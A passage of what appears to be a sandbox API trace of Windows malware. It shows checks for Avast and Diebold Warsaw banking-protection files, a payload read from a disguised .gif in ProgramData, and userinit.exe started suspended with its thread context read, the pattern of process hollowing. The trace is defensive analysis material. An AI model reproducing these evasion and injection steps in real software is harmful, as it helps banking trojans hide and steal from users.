[87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0220.348] ResumeThread (hThread=0x150) returned 0x1
[0220.348] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0220.348] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0220.348] GlobalUnlock (hMem=0x189000c) returned 0
[0220.348] GlobalHandle (pMem=0x1fd0f0) returned 0x1890004
[0220.348] GlobalUnlock (hMem=0x1890004) returned 0
[0220.356] Sleep (dwMilliseconds=0xe74e)
[0230.390] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0230.390] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0230.390] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0230.390] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0xee0d0 | out: lpFindFileData=0xee0d0) returned 0xffffffff
[0230.390] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158
[0230.390] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c8*=0) returned 0x0
[0230.391] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0230.391] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x5e000
[0230.391] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0xee1c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0xee1c0*=0) returned 0x0
[0230.392] GlobalLock (hMem=0x1890004) returned 0x1fd0f0
[0230.392] ReadFile (in: hFile=0x158, lpBuffer=0x1fd0f0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0xee1dc, lpOverlapped=0x0 | out: lpBuffer=0x1fd0f0*, lpNumberOfBytesRead=0xee1dc*=0x5e000, lpOverlapped=0x0) returned 1
[0230.394] CloseHandle (hObject=0x158) returned 1
[0230.394] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.395] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.395] GlobalUnlock (hMem=0x189000c) returned 0
[0230.395] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4000, uFlags=0x2) returned 0x189000c
[0230.395] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.396] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.396] GlobalUnlock (hMem=0x189000c) returned 0
[0230.396] GlobalReAlloc (hMem=0x189000c, dwBytes=0x6000, uFlags=0x2) returned 0x189000c
[0230.396] GlobalLock (hMem=0x189000c) returned 0x25f110
[0230.397] GlobalHandle (pMem=0x25f110) returned 0x189000c
[0230.397] GlobalUnlock (hMem=0x189000c) returned 0
[0230.397] GlobalReAlloc (hMem=0x189000c, dwBytes=0x8000, uFlags=0x2) returned 0x189000c
[0230.397] GlobalLock (hMem=0x189000c) returned 0x265120
[0230.398] GlobalHandle (pMem=0x265120) returned 0x189000c
[0230.398] GlobalUnlock (hMem=0x189000c) returned 0
[0230.398] GlobalReAlloc (hMem=0x189000c, dwBytes=0xa000, uFlags=0x2) returned 0x189000c
[0230.398] GlobalLock (hMem=0x189000c) returned 0x265120
[0230.399] GlobalHandle (pMem=0x265120) returned 0x189000c
[0230.399] GlobalUnlock (hMem=0x189000c) returned 0
[0230.399] GlobalReAlloc (hMem=0x189000c, dwBytes=0xc000, uFlags=0x2) returned 0x189000c
[0230.399] GlobalLock (hMem=0x189000c) returned 0x26f130
[0230.400] GlobalHandle (pMem=0x26f130) returned 0x189000c
[0230.400] GlobalUnlock (hMem=0x189000c) returned 0
[0230.400] GlobalReAlloc (hMem=0x189000c, dwBytes=0xe000, uFlags=0x2) returned 0x189000c
[0230.400] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.401] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.401] GlobalUnlock (hMem=0x189000c) returned 0
[0230.401] GlobalReAlloc (hMem=0x189000c, dwBytes=0x10000, uFlags=0x2) returned 0x189000c
[0230.401] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.402] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.402] GlobalUnlock (hMem=0x189000c) returned 0
[0230.402] GlobalReAlloc (hMem=0x189000c, dwBytes=0x12000, uFlags=0x2) returned 0x189000c
[0230.402] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.402] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.403] GlobalUnlock (hMem=0x189000c) returned 0
[0230.403] GlobalReAlloc (hMem=0x189000c, dwBytes=0x14000, uFlags=0x2) returned 0x189000c
[0230.403] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.403] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.403] GlobalUnlock (hMem=0x189000c) returned 0
[0230.403] GlobalReAlloc (hMem=0x189000c, dwBytes=0x16000, uFlags=0x2) returned 0x189000c
[0230.403] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.404] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.404] GlobalUnlock (hMem=0x189000c) returned 0
[0230.404] GlobalReAlloc (hMem=0x189000c, dwBytes=0x18000, uFlags=0x2) returned 0x189000c
[0230.404] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.405] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.405] GlobalUnlock (hMem=0x189000c) returned 0
[0230.405] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1a000, uFlags=0x2) returned 0x189000c
[0230.405] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.405] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.405] GlobalUnlock (hMem=0x189000c) returned 0
[0230.405] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1c000, uFlags=0x2) returned 0x189000c
[0230.406] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.406] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.406] GlobalUnlock (hMem=0x189000c) returned 0
[0230.406] GlobalReAlloc (hMem=0x189000c, dwBytes=0x1e000, uFlags=0x2) returned 0x189000c
[0230.406] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.407] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.407] GlobalUnlock (hMem=0x189000c) returned 0
[0230.407] GlobalReAlloc (hMem=0x189000c, dwBytes=0x20000, uFlags=0x2) returned 0x189000c
[0230.407] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.408] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.408] GlobalUnlock (hMem=0x189000c) returned 0
[0230.408] GlobalReAlloc (hMem=0x189000c, dwBytes=0x22000, uFlags=0x2) returned 0x189000c
[0230.409] GlobalLock (hMem=0x189000c) returned 0x27b110
[0230.410] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0230.410] GlobalUnlock (hMem=0x189000c) returned 0
[0230.410] GlobalReAlloc (hMem=0x189000c, dwBytes=0x24000, uFlags=0x2) returned 0x189000c
[0230.410] GlobalLock (hMem=0x189000c) returned 0x27b110
[0230.410] GlobalHandle (pMem=0x27b110) returned 0x189000c
[0230.410] GlobalUnlock (hMem=0x189000c) returned 0
[0230.410] GlobalReAlloc (hMem=0x189000c, dwBytes=0x26000, uFlags=0x2) returned 0x189000c
[0230.412] GlobalLock (hMem=0x189000c) returned 0x29f120
[0230.412] GlobalHandle (pMem=0x29f120) returned 0x189000c
[0230.412] GlobalUnlock (hMem=0x189000c) returned 0
[0230.412] GlobalReAlloc (hMem=0x189000c, dwBytes=0x28000, uFlags=0x2) returned 0x189000c
[0230.412] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.413] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.413] GlobalUnlock (hMem=0x189000c) returned 0
[0230.413] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2a000, uFlags=0x2) returned 0x189000c
[0230.413] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.414] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.414] GlobalUnlock (hMem=0x189000c) returned 0
[0230.414] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2c000, uFlags=0x2) returned 0x189000c
[0230.414] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.415] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.415] GlobalUnlock (hMem=0x189000c) returned 0
[0230.415] GlobalReAlloc (hMem=0x189000c, dwBytes=0x2e000, uFlags=0x2) returned 0x189000c
[0230.415] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.416] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.416] GlobalUnlock (hMem=0x189000c) returned 0
[0230.416] GlobalReAlloc (hMem=0x189000c, dwBytes=0x30000, uFlags=0x2) returned 0x189000c
[0230.416] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.416] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.417] GlobalUnlock (hMem=0x189000c) returned 0
[0230.417] GlobalReAlloc (hMem=0x189000c, dwBytes=0x32000, uFlags=0x2) returned 0x189000c
[0230.417] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.417] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.417] GlobalUnlock (hMem=0x189000c) returned 0
[0230.417] GlobalReAlloc (hMem=0x189000c, dwBytes=0x34000, uFlags=0x2) returned 0x189000c
[0230.417] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.418] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.418] GlobalUnlock (hMem=0x189000c) returned 0
[0230.418] GlobalReAlloc (hMem=0x189000c, dwBytes=0x36000, uFlags=0x2) returned 0x189000c
[0230.418] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.419] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.419] GlobalUnlock (hMem=0x189000c) returned 0
[0230.419] GlobalReAlloc (hMem=0x189000c, dwBytes=0x38000, uFlags=0x2) returned 0x189000c
[0230.419] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.419] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.419] GlobalUnlock (hMem=0x189000c) returned 0
[0230.419] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3a000, uFlags=0x2) returned 0x189000c
[0230.419] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.420] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.420] GlobalUnlock (hMem=0x189000c) returned 0
[0230.420] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3c000, uFlags=0x2) returned 0x189000c
[0230.420] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.421] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.421] GlobalUnlock (hMem=0x189000c) returned 0
[0230.421] GlobalReAlloc (hMem=0x189000c, dwBytes=0x3e000, uFlags=0x2) returned 0x189000c
[0230.421] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.422] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.422] GlobalUnlock (hMem=0x189000c) returned 0
[0230.422] GlobalReAlloc (hMem=0x189000c, dwBytes=0x40000, uFlags=0x2) returned 0x189000c
[0230.422] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.423] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.423] GlobalUnlock (hMem=0x189000c) returned 0
[0230.423] GlobalReAlloc (hMem=0x189000c, dwBytes=0x42000, uFlags=0x2) returned 0x189000c
[0230.423] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.423] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.423] GlobalUnlock (hMem=0x189000c) returned 0
[0230.423] GlobalReAlloc (hMem=0x189000c, dwBytes=0x44000, uFlags=0x2) returned 0x189000c
[0230.423] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.424] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.424] GlobalUnlock (hMem=0x189000c) returned 0
[0230.424] GlobalReAlloc (hMem=0x189000c, dwBytes=0x46000, uFlags=0x2) returned 0x189000c
[0230.424] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.425] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.425] GlobalUnlock (hMem=0x189000c) returned 0
[0230.425] GlobalReAlloc (hMem=0x189000c, dwBytes=0x48000, uFlags=0x2) returned 0x189000c
[0230.425] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.426] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.426] GlobalUnlock (hMem=0x189000c) returned 0
[0230.426] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4a000, uFlags=0x2) returned 0x189000c
[0230.426] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.426] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.426] GlobalUnlock (hMem=0x189000c) returned 0
[0230.426] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4c000, uFlags=0x2) returned 0x189000c
[0230.426] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.427] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.427] GlobalUnlock (hMem=0x189000c) returned 0
[0230.427] GlobalReAlloc (hMem=0x189000c, dwBytes=0x4e000, uFlags=0x2) returned 0x189000c
[0230.427] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.428] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.428] GlobalUnlock (hMem=0x189000c) returned 0
[0230.428] GlobalReAlloc (hMem=0x189000c, dwBytes=0x50000, uFlags=0x2) returned 0x189000c
[0230.428] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.428] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.428] GlobalUnlock (hMem=0x189000c) returned 0
[0230.429] GlobalReAlloc (hMem=0x189000c, dwBytes=0x52000, uFlags=0x2) returned 0x189000c
[0230.429] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.429] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.429] GlobalUnlock (hMem=0x189000c) returned 0
[0230.429] GlobalReAlloc (hMem=0x189000c, dwBytes=0x54000, uFlags=0x2) returned 0x189000c
[0230.429] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.430] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.430] GlobalUnlock (hMem=0x189000c) returned 0
[0230.430] GlobalReAlloc (hMem=0x189000c, dwBytes=0x56000, uFlags=0x2) returned 0x189000c
[0230.430] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.431] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.431] GlobalUnlock (hMem=0x189000c) returned 0
[0230.431] GlobalReAlloc (hMem=0x189000c, dwBytes=0x58000, uFlags=0x2) returned 0x189000c
[0230.431] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.431] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.431] GlobalUnlock (hMem=0x189000c) returned 0
[0230.431] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5a000, uFlags=0x2) returned 0x189000c
[0230.431] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.432] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.432] GlobalUnlock (hMem=0x189000c) returned 0
[0230.432] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5c000, uFlags=0x2) returned 0x189000c
[0230.432] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.433] GlobalHandle (pMem=0x25b100) returned 0x189000c
[0230.433] GlobalUnlock (hMem=0x189000c) returned 0
[0230.433] GlobalReAlloc (hMem=0x189000c, dwBytes=0x5e000, uFlags=0x2) returned 0x189000c
[0230.433] GlobalLock (hMem=0x189000c) returned 0x25b100
[0230.434] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1b0c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1b0c10 | out: lpCommandLine="", lpProcessInformation=0x1b0c10*(hProcess=0x154, hThread=0x158, dwProcessId=0xaa8, dwThreadId=0x9bc)) returned 1
[0230.469] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000
[0230.469] GetThreadContext (in: hThread=0x158, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x762be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14fbf0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, 